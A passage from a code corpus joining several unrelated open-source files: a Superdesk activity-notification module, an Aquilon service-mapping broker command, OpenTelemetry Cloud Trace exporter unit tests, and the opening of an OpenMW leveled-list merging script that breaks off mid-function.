if notify:
activity['recipients'] = [{'user_id': ObjectId(_id), 'read': False} for _id in notify]
name = activity_name
if notify_desks:
activity['recipients'].extend([{'desk_id': ObjectId(_id), 'read': False} for _id in notify_desks])
name = activity_name
if item:
activity['item'] = str(item.get('guid', item.get('_id')))
if item.get('task') and item['task'].get('desk'):
activity['desk'] = ObjectId(item['task']['desk'])
get_resource_service(ActivityResource.endpoint_name).post([activity])
if can_push_notification:
push_notification(name, _dest=activity['recipients'])
return activity
def notify_and_add_activity(activity_name, msg, resource=None, item=None, user_list=None, **data):
"""
Adds the activity and notify enabled and active users via email.
"""
add_activity(activity_name, msg=msg, resource=resource, item=item,
notify=[str(user.get("_id")) for user in user_list] if user_list else None, **data)
if activity_name == ACTIVITY_ERROR or user_list:
recipients = get_recipients(user_list, activity_name)
if activity_name != ACTIVITY_ERROR:
current_user = getattr(g, 'user', None)
activity = {
'name': activity_name,
'message': current_user.get('display_name') + ' ' + msg if current_user else msg,
'data': data,
'resource': resource
}
else:
activity = {
'name': activity_name,
'message': 'System ' + msg,
'data': data,
'resource': resource
}
if recipients:
send_activity_emails(activity=activity, recipients=recipients)
def get_recipients(user_list, activity_name):
if not user_list and activity_name == ACTIVITY_ERROR:
user_list = get_resource_service('users').get_users_by_user_type('administrator')
recipients = [user.get('email') for user in user_list if not user.get('needs_activation', True) and
user.get('is_enabled', False) and user.get('is_active', False) and
get_resource_service('preferences')
.email_notification_is_enabled(preferences=user.get('user_preferences', {}))]
return recipients
add_notifier(notify_and_add_activity)
|
akintolga/superdesk-core
|
superdesk/activity.py
|
Python
|
agpl-3.0
| 10,291 | 0.002624 |
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq map service`."""
from aquilon.worker.broker import BrokerCommand
from aquilon.aqdb.model import (Personality, HostEnvironment, ServiceMap,
ServiceInstance, NetworkEnvironment)
from aquilon.aqdb.model.host_environment import Production
from aquilon.worker.dbwrappers.change_management import (validate_prod_personality,
enforce_justification)
from aquilon.worker.dbwrappers.location import get_location
from aquilon.worker.dbwrappers.network import get_network_byip
class CommandMapService(BrokerCommand):
required_parameters = ["service", "instance"]
def doit(self, session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
dbenv):
if not dbmap:
dbmap = ServiceMap(service_instance=dbinstance, location=dblocation,
network=dbnetwork, personality=dbpersona,
host_environment=dbenv)
session.add(dbmap)
def render(self, session, logger, service, instance, archetype, personality,
host_environment, networkip, justification, reason, user,
**kwargs):
dbinstance = ServiceInstance.get_unique(session, service=service,
name=instance, compel=True)
dblocation = get_location(session, **kwargs)
if networkip:
dbnet_env = NetworkEnvironment.get_unique_or_default(session)
dbnetwork = get_network_byip(session, networkip, dbnet_env)
else:
dbnetwork = None
dbpersona = None
dbenv = None
if personality:
dbpersona = Personality.get_unique(session, name=personality,
archetype=archetype, compel=True)
for dbstage in dbpersona.stages.values():
validate_prod_personality(dbstage, user, justification, reason, logger)
elif host_environment:
dbenv = HostEnvironment.get_instance(session, host_environment)
if isinstance(dbenv, Production):
enforce_justification(user, justification, reason, logger)
else:
enforce_justification(user, justification, reason, logger)
q = session.query(ServiceMap)
q = q.filter_by(service_instance=dbinstance,
location=dblocation, network=dbnetwork,
personality=dbpersona,
host_environment=dbenv)
dbmap = q.first()
self.doit(session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
dbenv)
session.flush()
return
|
guillaume-philippon/aquilon
|
lib/aquilon/worker/commands/map_service.py
|
Python
|
apache-2.0
| 3,474 | 0.001727 |
# Copyright 2021 The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import unittest
from unittest import mock
import pkg_resources
from google.cloud.trace_v2.types import AttributeValue, BatchWriteSpansRequest
from google.cloud.trace_v2.types import Span as ProtoSpan
from google.cloud.trace_v2.types import TruncatableString
from google.rpc import code_pb2
from google.rpc.status_pb2 import Status
from opentelemetry.exporter.cloud_trace import (
MAX_EVENT_ATTRS,
MAX_LINK_ATTRS,
MAX_NUM_EVENTS,
MAX_NUM_LINKS,
CloudTraceSpanExporter,
_extract_attributes,
_extract_events,
_extract_links,
_extract_resources,
_extract_span_kind,
_extract_status,
_format_attribute_value,
_get_time_from_ns,
_strip_characters,
_truncate_str,
)
from opentelemetry.exporter.cloud_trace.version import __version__
from opentelemetry.sdk.resources import Resource
from opentelemetry.sdk.trace import Event
from opentelemetry.sdk.trace import _Span as Span
from opentelemetry.trace import Link, SpanContext, SpanKind
from opentelemetry.trace.status import Status as SpanStatus
from opentelemetry.trace.status import StatusCode
# pylint: disable=too-many-public-methods
class TestCloudTraceSpanExporter(unittest.TestCase):
def setUp(self):
self.client_patcher = mock.patch(
"opentelemetry.exporter.cloud_trace.TraceServiceClient"
)
self.client_patcher.start()
def tearDown(self):
self.client_patcher.stop()
@classmethod
def setUpClass(cls):
cls.project_id = "PROJECT"
cls.attributes_variety_pack = {
"str_key": "str_value",
"bool_key": False,
"double_key": 1.421,
"int_key": 123,
}
cls.extracted_attributes_variety_pack = ProtoSpan.Attributes(
attribute_map={
"str_key": AttributeValue(
string_value=TruncatableString(
value="str_value", truncated_byte_count=0
)
),
"bool_key": AttributeValue(bool_value=False),
"double_key": AttributeValue(
string_value=TruncatableString(
value="1.4210", truncated_byte_count=0
)
),
"int_key": AttributeValue(int_value=123),
}
)
cls.agent_code = _format_attribute_value(
"opentelemetry-python {}; google-cloud-trace-exporter {}".format(
_strip_characters(
pkg_resources.get_distribution("opentelemetry-sdk").version
),
_strip_characters(__version__),
)
)
cls.example_trace_id = "6e0c63257de34c92bf9efcd03927272e"
cls.example_span_id = "95bb5edabd45950f"
cls.example_time_in_ns = 1589919268850900051
cls.example_time_stamp = _get_time_from_ns(cls.example_time_in_ns)
cls.str_20kb = "a" * 20 * 1024
cls.str_16kb = "a" * 16 * 1024
cls.str_300 = "a" * 300
cls.str_256 = "a" * 256
cls.str_128 = "a" * 128
def test_constructor_default(self):
exporter = CloudTraceSpanExporter(self.project_id)
self.assertEqual(exporter.project_id, self.project_id)
def test_constructor_explicit(self):
client = mock.Mock()
exporter = CloudTraceSpanExporter(self.project_id, client=client)
self.assertIs(exporter.client, client)
self.assertEqual(exporter.project_id, self.project_id)
def test_export(self):
resource_info = Resource(
{
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"gcp.resource_type": "gce_instance",
}
)
span_datas = [
Span(
name="span_name",
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
parent=None,
kind=SpanKind.INTERNAL,
resource=resource_info,
attributes={"attr_key": "attr_value"},
)
]
cloud_trace_spans = {
"name": "projects/{}/traces/{}/spans/{}".format(
self.project_id, self.example_trace_id, self.example_span_id
),
"span_id": self.example_span_id,
"parent_span_id": None,
"display_name": TruncatableString(
value="span_name", truncated_byte_count=0
),
"attributes": ProtoSpan.Attributes(
attribute_map={
"g.co/r/gce_instance/zone": _format_attribute_value("US"),
"g.co/r/gce_instance/instance_id": _format_attribute_value(
"host"
),
"g.co/r/gce_instance/project_id": _format_attribute_value(
"123"
),
"g.co/agent": self.agent_code,
"attr_key": _format_attribute_value("attr_value"),
}
),
"links": None,
"status": None,
"time_events": None,
"start_time": None,
"end_time": None,
# pylint: disable=no-member
"span_kind": ProtoSpan.SpanKind.INTERNAL,
}
client = mock.Mock()
exporter = CloudTraceSpanExporter(self.project_id, client=client)
exporter.export(span_datas)
self.assertTrue(client.batch_write_spans.called)
client.batch_write_spans.assert_called_with(
request=BatchWriteSpansRequest(
name="projects/{}".format(self.project_id),
spans=[cloud_trace_spans],
)
)
def test_extract_status_code_unset(self):
self.assertIsNone(
_extract_status(SpanStatus(status_code=StatusCode.UNSET))
)
def test_extract_status_code_ok(self):
self.assertEqual(
_extract_status(SpanStatus(status_code=StatusCode.OK)),
Status(code=code_pb2.OK),
)
def test_extract_status_code_error(self):
self.assertEqual(
_extract_status(
SpanStatus(
status_code=StatusCode.ERROR,
description="error_desc",
)
),
Status(code=code_pb2.UNKNOWN, message="error_desc"),
)
def test_extract_status_code_future_added(self):
self.assertEqual(
_extract_status(
SpanStatus(
status_code=mock.Mock(),
)
),
Status(code=code_pb2.UNKNOWN),
)
def test_extract_empty_attributes(self):
self.assertEqual(
_extract_attributes({}, num_attrs_limit=4),
ProtoSpan.Attributes(attribute_map={}),
)
def test_extract_variety_of_attributes(self):
self.assertEqual(
_extract_attributes(
self.attributes_variety_pack, num_attrs_limit=4
),
self.extracted_attributes_variety_pack,
)
def test_extract_label_mapping_attributes(self):
attributes_labels_mapping = {
"http.scheme": "http",
"http.host": "172.19.0.4:8000",
"http.method": "POST",
"http.request_content_length": 321,
"http.response_content_length": 123,
"http.route": "/fuzzy/search",
"http.status_code": 200,
"http.url": "http://172.19.0.4:8000/fuzzy/search",
"http.user_agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
}
extracted_attributes_labels_mapping = ProtoSpan.Attributes(
attribute_map={
"/http/client_protocol": AttributeValue(
string_value=TruncatableString(
value="http", truncated_byte_count=0
)
),
"/http/host": AttributeValue(
string_value=TruncatableString(
value="172.19.0.4:8000", truncated_byte_count=0
)
),
"/http/method": AttributeValue(
string_value=TruncatableString(
value="POST", truncated_byte_count=0
)
),
"/http/request/size": AttributeValue(int_value=321),
"/http/response/size": AttributeValue(int_value=123),
"/http/route": AttributeValue(
string_value=TruncatableString(
value="/fuzzy/search", truncated_byte_count=0
)
),
"/http/status_code": AttributeValue(int_value=200),
"/http/url": AttributeValue(
string_value=TruncatableString(
value="http://172.19.0.4:8000/fuzzy/search",
truncated_byte_count=0,
)
),
"/http/user_agent": AttributeValue(
string_value=TruncatableString(
value="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
truncated_byte_count=0,
)
),
}
)
self.assertEqual(
_extract_attributes(attributes_labels_mapping, num_attrs_limit=9),
extracted_attributes_labels_mapping,
)
def test_ignore_invalid_attributes(self):
self.assertEqual(
_extract_attributes(
{"illegal_attribute_value": {}, "legal_attribute": 3},
num_attrs_limit=4,
),
ProtoSpan.Attributes(
attribute_map={"legal_attribute": AttributeValue(int_value=3)},
dropped_attributes_count=1,
),
)
def test_too_many_attributes(self):
too_many_attrs = {}
for attr_key in range(5):
too_many_attrs[str(attr_key)] = 0
proto_attrs = _extract_attributes(too_many_attrs, num_attrs_limit=4)
self.assertEqual(proto_attrs.dropped_attributes_count, 1)
def test_add_agent_attribute(self):
self.assertEqual(
_extract_attributes({}, num_attrs_limit=4, add_agent_attr=True),
ProtoSpan.Attributes(
attribute_map={"g.co/agent": self.agent_code},
dropped_attributes_count=0,
),
)
def test_agent_attribute_priority(self):
# Drop existing attributes in favor of the agent attribute
self.assertEqual(
_extract_attributes(
{"attribute_key": "attr_value"},
num_attrs_limit=1,
add_agent_attr=True,
),
ProtoSpan.Attributes(
attribute_map={"g.co/agent": self.agent_code},
dropped_attributes_count=1,
),
)
def test_attribute_value_truncation(self):
# shouldn't truncate
self.assertEqual(
_format_attribute_value(self.str_300),
AttributeValue(
string_value=TruncatableString(
value=self.str_300,
truncated_byte_count=0,
)
),
)
# huge string should truncate
self.assertEqual(
_format_attribute_value(self.str_20kb),
AttributeValue(
string_value=TruncatableString(
value=self.str_16kb,
truncated_byte_count=(20 - 16) * 1024,
)
),
)
def test_list_attribute_value(self):
self.assertEqual(
_format_attribute_value(("one", "two")),
AttributeValue(
string_value=TruncatableString(
value="one,two", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value([True]),
AttributeValue(
string_value=TruncatableString(
value="True", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value((2, 5)),
AttributeValue(
string_value=TruncatableString(
value="2,5", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value([2.0, 0.5, 4.55]),
AttributeValue(
string_value=TruncatableString(
value="2.0,0.5,4.55", truncated_byte_count=0
)
),
)
def test_attribute_key_truncation(self):
self.assertEqual(
_extract_attributes(
{self.str_300: "attr_value"}, num_attrs_limit=4
),
ProtoSpan.Attributes(
attribute_map={
self.str_128: AttributeValue(
string_value=TruncatableString(
value="attr_value", truncated_byte_count=0
)
)
}
),
)
def test_extract_empty_events(self):
self.assertIsNone(_extract_events([]))
def test_too_many_events(self):
event = Event(
name="event", timestamp=self.example_time_in_ns, attributes={}
)
too_many_events = [event] * (MAX_NUM_EVENTS + 5)
self.assertEqual(
_extract_events(too_many_events),
ProtoSpan.TimeEvents(
time_event=[
{
"time": self.example_time_stamp,
"annotation": {
"description": TruncatableString(
value="event",
),
"attributes": {},
},
},
]
* MAX_NUM_EVENTS,
dropped_annotations_count=len(too_many_events)
- MAX_NUM_EVENTS,
),
)
def test_too_many_event_attributes(self):
event_attrs = {}
for attr_key in range(MAX_EVENT_ATTRS + 5):
event_attrs[str(attr_key)] = 0
proto_events = _extract_events(
[
Event(
name="a",
attributes=event_attrs,
timestamp=self.example_time_in_ns,
)
]
)
self.assertEqual(
len(
proto_events.time_event[0].annotation.attributes.attribute_map
),
MAX_EVENT_ATTRS,
)
self.assertEqual(
proto_events.time_event[
0
].annotation.attributes.dropped_attributes_count,
len(event_attrs) - MAX_EVENT_ATTRS,
)
def test_extract_multiple_events(self):
event1 = Event(
name="event1",
attributes=self.attributes_variety_pack,
timestamp=self.example_time_in_ns,
)
event2_nanos = 1589919438550020326
event2 = Event(
name="event2",
attributes={"illegal_attr_value": dict()},
timestamp=event2_nanos,
)
self.assertEqual(
_extract_events([event1, event2]),
ProtoSpan.TimeEvents(
time_event=[
{
"time": self.example_time_stamp,
"annotation": {
"description": TruncatableString(
value="event1", truncated_byte_count=0
),
"attributes": self.extracted_attributes_variety_pack,
},
},
{
"time": _get_time_from_ns(event2_nanos),
"annotation": {
"description": TruncatableString(
value="event2", truncated_byte_count=0
),
"attributes": ProtoSpan.Attributes(
attribute_map={}, dropped_attributes_count=1
),
},
},
]
),
)
def test_event_name_truncation(self):
event1 = Event(
name=self.str_300, attributes={}, timestamp=self.example_time_in_ns
)
self.assertEqual(
_extract_events([event1]),
ProtoSpan.TimeEvents(
time_event=[
{
"time": self.example_time_stamp,
"annotation": {
"description": TruncatableString(
value=self.str_256,
truncated_byte_count=300 - 256,
),
"attributes": {},
},
},
]
),
)
def test_extract_empty_links(self):
self.assertIsNone(_extract_links([]))
def test_extract_multiple_links(self):
span_id1 = "95bb5edabd45950f"
span_id2 = "b6b86ad2915c9ddc"
link1 = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(span_id1, 16),
is_remote=False,
),
attributes={},
)
link2 = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(span_id1, 16),
is_remote=False,
),
attributes=self.attributes_variety_pack,
)
link3 = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(span_id2, 16),
is_remote=False,
),
attributes={"illegal_attr_value": dict(), "int_attr_value": 123},
)
self.assertEqual(
_extract_links([link1, link2, link3]),
ProtoSpan.Links(
link=[
{
"trace_id": self.example_trace_id,
"span_id": span_id1,
"type": "TYPE_UNSPECIFIED",
"attributes": ProtoSpan.Attributes(attribute_map={}),
},
{
"trace_id": self.example_trace_id,
"span_id": span_id1,
"type": "TYPE_UNSPECIFIED",
"attributes": self.extracted_attributes_variety_pack,
},
{
"trace_id": self.example_trace_id,
"span_id": span_id2,
"type": "TYPE_UNSPECIFIED",
"attributes": {
"attribute_map": {
"int_attr_value": AttributeValue(int_value=123)
},
},
},
]
),
)
def test_extract_link_with_none_attribute(self):
link = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
attributes=None,
)
self.assertEqual(
_extract_links([link]),
ProtoSpan.Links(
link=[
{
"trace_id": self.example_trace_id,
"span_id": self.example_span_id,
"type": "TYPE_UNSPECIFIED",
"attributes": ProtoSpan.Attributes(attribute_map={}),
},
]
),
)
def test_too_many_links(self):
link = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
attributes={},
)
too_many_links = [link] * (MAX_NUM_LINKS + 5)
self.assertEqual(
_extract_links(too_many_links),
ProtoSpan.Links(
link=[
{
"trace_id": self.example_trace_id,
"span_id": self.example_span_id,
"type": "TYPE_UNSPECIFIED",
"attributes": {},
}
]
* MAX_NUM_LINKS,
dropped_links_count=len(too_many_links) - MAX_NUM_LINKS,
),
)
def test_too_many_link_attributes(self):
link_attrs = {}
for attr_key in range(MAX_LINK_ATTRS + 1):
link_attrs[str(attr_key)] = 0
attr_link = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
attributes=link_attrs,
)
proto_link = _extract_links([attr_link])
self.assertEqual(
len(proto_link.link[0].attributes.attribute_map), MAX_LINK_ATTRS
)
def test_extract_empty_resources(self):
self.assertEqual(_extract_resources(Resource.get_empty()), {})
def test_extract_resource_attributes_with_regex(self):
resource_regex = re.compile(r"service\..*")
resource = Resource(
attributes={
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"extra_info": "extra",
"gcp.resource_type": "gce_instance",
"not_gcp_resource": "value",
"service.name": "my-app",
"service.version": "1",
}
)
expected_extract = {
"g.co/r/gce_instance/project_id": "123",
"g.co/r/gce_instance/instance_id": "host",
"g.co/r/gce_instance/zone": "US",
"service.name": "my-app",
"service.version": "1",
}
self.assertEqual(
_extract_resources(resource, resource_regex), expected_extract
)
def test_non_matching_regex(self):
resource_regex = re.compile(r"this-regex-matches-nothing")
resource = Resource(
attributes={
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"extra_info": "extra",
"gcp.resource_type": "gce_instance",
"not_gcp_resource": "value",
}
)
expected_extract = {
"g.co/r/gce_instance/project_id": "123",
"g.co/r/gce_instance/instance_id": "host",
"g.co/r/gce_instance/zone": "US",
}
self.assertEqual(
_extract_resources(resource, resource_regex), expected_extract
)
def test_extract_well_formed_resources(self):
resource = Resource(
attributes={
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"extra_info": "extra",
"gcp.resource_type": "gce_instance",
"not_gcp_resource": "value",
}
)
expected_extract = {
"g.co/r/gce_instance/project_id": "123",
"g.co/r/gce_instance/instance_id": "host",
"g.co/r/gce_instance/zone": "US",
}
self.assertEqual(_extract_resources(resource), expected_extract)
def test_extract_malformed_resources(self):
# This resource doesn't have all the fields required for a gce_instance
# Specifically its missing "host.id", "cloud.zone", "cloud.account.id"
resource = Resource(
attributes={
"gcp.resource_type": "gce_instance",
"cloud.provider": "gcp",
}
)
# Should throw when passed a malformed GCP resource dict
self.assertRaises(KeyError, _extract_resources, resource)
def test_extract_unsupported_gcp_resources(self):
# Unsupported gcp resources will be ignored
resource = Resource(
attributes={
"cloud.account.id": "123",
"host.id": "host",
"extra_info": "extra",
"not_gcp_resource": "value",
"gcp.resource_type": "unsupported_gcp_resource",
"cloud.provider": "gcp",
}
)
self.assertEqual(_extract_resources(resource), {})
def test_extract_unsupported_provider_resources(self):
# Resources with currently unsupported providers will be ignored
resource = Resource(
attributes={
"cloud.account.id": "123",
"host.id": "host",
"extra_info": "extra",
"not_gcp_resource": "value",
"cloud.provider": "aws",
}
)
self.assertEqual(_extract_resources(resource), {})
def test_truncate_string(self):
"""Cloud Trace API imposes limits on the length of many things,
e.g. strings, number of events, number of attributes. We truncate
these things before sending it to the API as an optimization.
"""
self.assertEqual(_truncate_str("aaaa", limit=1), ("a", 3))
self.assertEqual(_truncate_str("aaaa", limit=5), ("aaaa", 0))
self.assertEqual(_truncate_str("aaaa", limit=4), ("aaaa", 0))
self.assertEqual(_truncate_str("中文翻译", limit=4), ("中", 9))
def test_strip_characters(self):
self.assertEqual("0.10.0", _strip_characters("0.10.0b"))
self.assertEqual("1.20.5", _strip_characters("1.20.5"))
self.assertEqual("3.1.0", _strip_characters("3.1.0beta"))
self.assertEqual("4.2.0", _strip_characters("4b.2rc.0a"))
self.assertEqual("6.20.15", _strip_characters("b6.20.15"))
# pylint: disable=no-member
def test_extract_span_kind(self):
self.assertEqual(
_extract_span_kind(SpanKind.INTERNAL), ProtoSpan.SpanKind.INTERNAL
)
self.assertEqual(
_extract_span_kind(SpanKind.CLIENT), ProtoSpan.SpanKind.CLIENT
)
self.assertEqual(
_extract_span_kind(SpanKind.SERVER), ProtoSpan.SpanKind.SERVER
)
self.assertEqual(
_extract_span_kind(SpanKind.CONSUMER), ProtoSpan.SpanKind.CONSUMER
)
self.assertEqual(
_extract_span_kind(SpanKind.PRODUCER), ProtoSpan.SpanKind.PRODUCER
)
self.assertEqual(
_extract_span_kind(-1), ProtoSpan.SpanKind.SPAN_KIND_UNSPECIFIED
)
|
GoogleCloudPlatform/opentelemetry-operations-python
|
opentelemetry-exporter-gcp-trace/tests/test_cloud_trace_exporter.py
|
Python
|
apache-2.0
| 28,235 | 0.000106 |
#!/usr/bin/env python3
from struct import pack, unpack
from datetime import date
from pathlib import Path
import os.path
import argparse
import sys
import re
configFilename = 'openmw.cfg'
configPaths = { 'linux': '~/.config/openmw',
'freebsd': '~/.config/openmw',
'darwin': '~/Library/Preferences/openmw' }
modPaths = { 'linux': '~/.local/share/openmw/data',
'freebsd': '~/.local/share/openmw/data',
'darwin': '~/Library/Application Support/openmw/data' }
def packLong(i):
# little-endian, "standard" 4-bytes (old 32-bit systems)
return pack('<l', i)
def packString(s):
return bytes(s, 'ascii')
def packPaddedString(s, l):
bs = bytes(s, 'ascii')
if len(bs) > l:
# still need to null-terminate
return bs[:(l-1)] + bytes(1)
else:
return bs + bytes(l - len(bs))
def parseString(ba):
i = ba.find(0)
return ba[:i].decode(encoding='ascii', errors='ignore')
def parseNum(ba):
return int.from_bytes(ba, 'little')
def parseFloat(ba):
return unpack('f', ba)[0]
def parseLEV(rec):
levrec = {}
sr = rec['subrecords']
levrec['type'] = rec['type']
levrec['name'] = parseString(sr[0]['data'])
levrec['calcfrom'] = parseNum(sr[1]['data'])
levrec['chancenone'] = parseNum(sr[2]['data'])
levrec['file'] = os.path.basename(rec['fullpath'])
# Apparently, you can have LEV records that end before
# the INDX subrecord. Found those in Tamriel_Data.esm
if len(sr) > 3:
listcount = parseNum(sr[3]['data'])
listitems = []
for i in range(0,listcount*2,2):
itemid = parseString(sr[4+i]['data'])
itemlvl = parseNum(sr[5+i]['data'])
listitems.append((itemlvl, itemid))
levrec['items'] = listitems
else:
levrec['items'] = []
return levrec
def parseTES3(rec):
tesrec = {}
sr = rec['subrecords']
tesrec['version'] = parseFloat(sr[0]['data'][0:4])
tesrec['filetype'] = parseNum(sr[0]['data'][4:8])
tesrec['author'] = parseString(sr[0]['data'][8:40])
tesrec['desc'] = parseString(sr[0]['data'][40:296])
tesrec['numrecords'] = parseNum(sr[0]['data'][296:300])
masters = []
for i in range(1, len(sr), 2):
mastfile = parseString(sr[i]['data'])
mastsize = parseNum(sr[i+1]['data'])
masters.append((mastfile, mastsize))
tesrec['masters'] = masters
return tesrec
def pullSubs(rec, subtype):
return [ s for s in rec['subrecords'] if s['type'] == subtype ]
def readHeader(ba):
header = {}
header['type'] = ba[0:4].decode()
header['length'] = int.from_bytes(ba[4:8], 'little')
return header
def readSubRecord(ba):
sr = {}
sr['type'] = ba[0:4].decode()
sr['length'] = int.from_bytes(ba[4:8], 'little')
endbyte = 8 + sr['length']
sr['data'] = ba[8:endbyte]
return (sr, ba[endbyte:])
def readRecords(filename):
fh = open(filename, 'rb')
while True:
headerba = fh.read(16)
if headerba is None or len(headerba) < 16:
return None
record = {}
header = readHeader(headerba)
record['type'] = header['type']
record['length'] = header['length']
record['subrecords'] = []
# stash the filename here (a bit hacky, but useful)
record['fullpath'] = filename
remains = fh.read(header['length'])
while len(remains) > 0:
(subrecord, restofbytes) = readSubRecord(remains)
record['subrecords'].append(subrecord)
remains = restofbytes
yield record
def oldGetRecords(filename, rectype):
return ( r for r in readRecords(filename) if r['type'] == rectype )
def getRecords(filename, rectypes):
numtypes = len(rectypes)
retval = [ [] for x in range(numtypes) ]
for r in readRecords(filename):
if r['type'] in rectypes:
for i in range(numtypes):
if r['type'] == rectypes[i]:
retval[i].append(r)
return retval
def packStringSubRecord(lbl, strval):
str_bs = packString(strval) + bytes(1)
l = packLong(len(str_bs))
return packString(lbl) + l + str_bs
def packIntSubRecord(lbl, num, numsize=4):
# This is interesting. The 'pack' function from struct works fine like this:
#
# >>> pack('<l', 200)
# b'\xc8\x00\x00\x00'
#
# but breaks if you make that format string a non-literal:
#
# >>> fs = '<l'
# >>> pack(fs, 200)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# struct.error: repeat count given without format specifier
#
# This is as of Python 3.5.2
num_bs = b''
if numsize == 4:
# "standard" 4-byte longs, little-endian
num_bs = pack('<l', num)
elif numsize == 2:
num_bs = pack('<h', num)
elif numsize == 1:
# don't think endian-ness matters for bytes, but consistency
num_bs = pack('<b', num)
elif numsize == 8:
num_bs = pack('<q', num)
return packString(lbl) + packLong(numsize) + num_bs
def packLEV(rec):
start_bs = b''
id_bs = b''
if rec['type'] == 'LEVC':
start_bs += b'LEVC'
id_bs = 'CNAM'
else:
start_bs += b'LEVI'
id_bs = 'INAM'
headerflags_bs = bytes(8)
name_bs = packStringSubRecord('NAME', rec['name'])
calcfrom_bs = packIntSubRecord('DATA', rec['calcfrom'])
chance_bs = packIntSubRecord('NNAM', rec['chancenone'], 1)
subrec_bs = packIntSubRecord('INDX', len(rec['items']))
for (lvl, lid) in rec['items']:
subrec_bs += packStringSubRecord(id_bs, lid)
subrec_bs += packIntSubRecord('INTV', lvl, 2)
reclen = len(name_bs) + len(calcfrom_bs) + len(chance_bs) + len(subrec_bs)
reclen_bs = packLong(reclen)
return start_bs + reclen_bs + headerflags_bs + \
name_bs + calcfrom_bs + chance_bs + subrec_bs
def packTES3(desc, numrecs, masters):
start_bs = b'TES3'
headerflags_bs = bytes(8)
hedr_bs = b'HEDR' + packLong(300)
version_bs = pack('<f', 1.0)
# .esp == 0, .esm == 1, .ess == 32
# suprisingly, .omwaddon == 0, also -- figured it would have its own
ftype_bs = bytes(4)
author_bs = packPaddedString('omwllf, copyright 2017, jmelesky', 32)
desc_bs = packPaddedString(desc, 256)
numrecs_bs = packLong(numrecs)
masters_bs = b''
for (m, s) in masters:
masters_bs += packStringSubRecord('MAST', m)
masters_bs += packIntSubRecord('DATA', s, 8)
reclen = len(hedr_bs) + len(version_bs) + len(ftype_bs) + len(author_bs) +\
len(desc_bs) + len(numrecs_bs) + len(masters_bs)
reclen_bs = packLong(reclen)
return start_bs + reclen_bs + headerflags_bs + \
hedr_bs + version_bs + ftype_bs + author_bs + \
desc_bs + numrecs_bs + masters_bs
def ppSubRecord(sr):
if sr['type'] in ['NAME', 'INAM', 'CNAM']:
print(" %s, length %d, value '%s'" % (sr['type'], sr['length'], parseString(sr['data'])))
elif sr['type'] in ['DATA', 'NNAM', 'INDX', 'INTV']:
print(" %s, length %d, value '%s'" % (sr['type'], sr['length'], parseNum(sr['data'])))
else:
print(" %s, length %d" % (sr['type'], sr['length']))
def ppRecord(rec):
print("%s, length %d" % (rec['type'], rec['length']))
for sr in rec['subrecords']:
ppSubRecord(sr)
def ppLEV(rec):
if rec['type'] == 'LEVC':
print("Creature list '%s' from '%s':" % (rec['name'], rec['file']))
else:
print("Item list '%s' from '%s':" % (rec['name'], rec['file']))
print("flags: %d, chance of none: %d" % (rec['calcfrom'], rec['chancenone']))
for (lvl, lid) in rec['items']:
print(" %2d - %s" % (lvl, lid))
def ppTES3(rec):
print("TES3 record, type %d, version %f" % (rec['filetype'], rec['version']))
print("author: %s" % rec['author'])
print("description: %s" % rec['desc'])
for (mfile, msize) in rec['masters']:
print(" master %s, size %d" % (mfile, msize))
print()
def mergeableLists(alllists):
candidates = {}
for l in alllists:
lid = l['name']
if lid in candidates:
candidates[lid].append(l)
else:
candidates[lid] = [l]
mergeables = {}
for k in candidates:
if len(candidates[k]) > 1:
mergeables[k] = candidates[k]
return mergeables
def mergeLists(lls):
# last one gets priority for list-level attributes
last = lls[-1]
newLev = { 'type': last['type'],
'name': last['name'],
'calcfrom': last['calcfrom'],
'chancenone': last['chancenone'] }
allItems = []
for l in lls:
allItems += l['items']
newLev['files'] = [ x['file'] for x in lls ]
newLev['file'] = ', '.join(newLev['files'])
# This ends up being a bit tricky, but it prevents us
# from overloading lists with the same stuff.
#
# This is needed, because the original leveled lists
# contain multiple entries for some creatures/items, and
# that gets reproduced in many plugins.
#
# If we just added and sorted, then the more plugins you
